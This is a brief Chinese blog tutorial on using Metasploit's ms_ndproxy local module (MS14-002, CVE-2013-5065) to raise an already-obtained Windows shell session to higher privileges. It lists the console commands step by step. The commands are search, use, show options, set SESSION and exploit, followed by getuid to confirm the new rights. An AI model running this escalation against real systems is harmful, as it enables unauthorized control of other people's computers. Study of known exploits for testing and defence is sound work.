Metasploit之NDProxy内核提权

  • A+
所属分类:颓废's Blog

Metasploit之NDProxy内核提权
参考视频:http://open.freebuf.com/inland/459.html

使用这个权限提升模块来提升当前已经获得的shell的权限
所以首先得需要一个shell的会话,即session会话

使用模块“exploit/windows/local/ms_ndproxy”来提升权限的
该漏洞的利用是基于ms14-002,Microsoft Windows NDProxy.sys,CVE-2013-5065

search 14-002                           -->搜索这个漏洞的相关模块

得到下面两个
exploit/windows/local/bthpan            -->微软蓝牙个人区域网络(bthpan。sys)特权升级

exploit/windows/local/ms_ndproxy        -->微软的,即Windows的漏洞利用模块

use exploit/windows/local/ms_ndproxy    -->使用这个模块

show options                            -->查看配置选项

我们可以看到只需要配置一个会话选项SESSION,那么我们只要把需要提升权限的会话set进去即可

set SESSION 1                           -->设置会话1来进行权限提升

exploit                                 -->执行攻击,提升权限 

getuid                                  -->查看当前权限,提权后可查看

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: